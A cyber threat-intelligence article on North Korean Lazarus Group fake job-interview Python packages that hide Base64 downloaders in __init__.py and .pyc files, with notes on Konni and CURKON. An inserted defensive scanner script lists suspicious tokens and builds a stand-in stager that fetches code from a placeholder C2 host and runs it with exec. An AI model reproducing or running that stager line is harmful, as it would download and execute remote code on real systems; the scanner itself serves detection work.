Cybersecurity researchers have uncovered a new set of malicious Python packages that target software developers under the guise of coding assessments. "The new samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews," ReversingLabs researcher Karlo Zanki said. The activity has been assessed to be part of an ongoing VMConnect campaign that first came to light in August 2023. There are indications that it is the handiwork of the North Korea-backed Lazarus Group.[1]
See: https://redskyalliance.org/xindustry/lazarus-group-still-deploys-remote-access-trojans
North Korean threat actors have widely adopted job interviews as an infection vector. They either approach unsuspecting developers on sites such as LinkedIn or trick them into downloading rogue packages as part of a purported skills test. These packages, for their part, have been published directly on public repositories like npm and PyPI or hosted on GitHub repositories under their control.
ReversingLabs said it identified malicious code embedded within modified versions of legitimate PyPI libraries such as Paperclip and Pure Base. "The malicious code is present in both the __init__.py file and its corresponding compiled Python file (PYC) inside the __pycache__ directory of respective modules," Zanki said.
It is implemented as a Base64-encoded string that obscures a downloader function, establishing contact with a command-and-control (C2) server to execute commands received as a response. In one instance of the coding assignment identified by the software supply chain firm, the threat actors sought to create a false sense of urgency by requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
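A defensive triage script for a package received this way, added here as an example (it is not code from the article, from ReversingLabs or from the packages discussed): it looks in the two places the report names, `__init__.py` and the compiled `.pyc` under `__pycache__`, decodes any long Base64 literal it finds, and flags decoded text that reaches out to the network or executes code. The package layout, the token list and the stand-in payload are constructed assumptions.

```python
import base64
import py_compile
import re
import tempfile
from pathlib import Path
# Tokens that, inside a decoded blob, point to a downloader / command-execution stager.
SUSPICIOUS = ("exec(", "eval(", "urlopen", "requests.", "socket", "subprocess", "__import__")
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")  # long enough to hide code, not a key

def decode_candidates(text):
    """Yield the UTF-8 plaintext of every long Base64-looking literal in text."""
    for match in B64_RE.finditer(text):
        chunk = match.group(0)
        # In a .pyc the literal can be glued to neighbouring marshal bytes that happen to be
        # Base64 characters, so try each of the four alignments and cut to a 4-char multiple.
        for off in range(4):
            body = chunk[off:]
            body = body[: len(body) - len(body) % 4]
            try:
                yield base64.b64decode(body, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue

def scan_source(text):
    # Suspicious tokens found in any Base64 payload embedded in a source string.
    hits = set()
    for payload in decode_candidates(text):
        hits.update(tok for tok in SUSPICIOUS if tok in payload)
    return sorted(hits)

def scan_package(root):
    """Scan every __init__.py and __pycache__/*.pyc under root; return {relative path: hits}."""
    root, findings = Path(root), {}
    for path in list(root.rglob("__init__.py")) + list(root.rglob("__pycache__/*.pyc")):
        # marshal keeps str constants as raw bytes inside the .pyc, so latin-1 leaves the literal intact
        hits = scan_source(path.read_bytes().decode("latin-1"))
        if hits:
            findings[str(path.relative_to(root))] = hits
    return findings

# Constructed stand-in for the hidden stager; it is only decoded and inspected here, never executed.
SAMPLE_PAYLOAD = "from urllib.request import urlopen\nexec(urlopen('http://c2.example.invalid/t').read())\n"
SAMPLE_INIT = ("# constructed sample module: a long literal nobody reviews by eye\n"
               f"_blob = {base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()!r}\n")

def demo():
    # Write the constructed package to a temp dir, compile it so __pycache__ exists, and scan both.
    with tempfile.TemporaryDirectory() as tmp:
        pkg = Path(tmp) / "pkg"
        pkg.mkdir()
        (pkg / "__init__.py").write_text(SAMPLE_INIT)
        py_compile.compile(str(pkg / "__init__.py"), doraise=True)  # -> pkg/__pycache__/__init__.cpython-XY.pyc
        return scan_package(tmp)
```

Run `demo()` to see both the source file and its compiled `.pyc` reported; in practice, point `scan_package` at the unpacked ZIP before anything in it is imported or run.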
This makes it "more likely that he or she would execute the package without performing any type of security or even source code review first," Zanki said, adding, "That ensures the malicious actors behind this campaign that the embedded malware would be executed on the developer's system." Some tests claimed to be technical interviews for financial institutions like Capital One and Rookery Capital Limited, underscoring how the threat actors impersonate legitimate companies in the sector to pull off the operation.
It is currently unclear how widespread these campaigns are, although prospective targets are scouted and contacted using LinkedIn. "After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user's macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons," the company said.
The development comes as cybersecurity company Genians revealed that the North Korean threat actor codenamed Konni is intensifying its attacks against Russia and South Korea by employing spear-phishing lures that lead to the deployment of AsyncRAT. Overlaps have been identified with a campaign codenamed CLOUD#REVERSER (aka puNK-002).
Some of these attacks also involve propagating a new malware called CURKON, a Windows shortcut (LNK) file that serves as a downloader for an AutoIt version of Lilith RAT. Per S2W, the activity has been linked to a sub-cluster tracked as puNK-003.
This article is shared at no charge and is for educational and informational purposes only.
Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. We provide indicators of compromise information via a notification service (RedXray) or an analysis service (CTAC). For questions, comments, or assistance, please get in touch with the office directly at 1-844-492-7225 or feedback@redskyalliance.com
- Reporting: https://www.redskyalliance.org/
- Website: https://www.redskyalliance.com/
- LinkedIn: https://www.linkedin.com/company/64265941
REDSHORTS - Weekly Cyber Intelligence Briefings
https://register.gotowebinar.com/register/5378972949933166424
[1] https://thehackernews.com/2024/09/developers-beware-lazarus-group-uses.html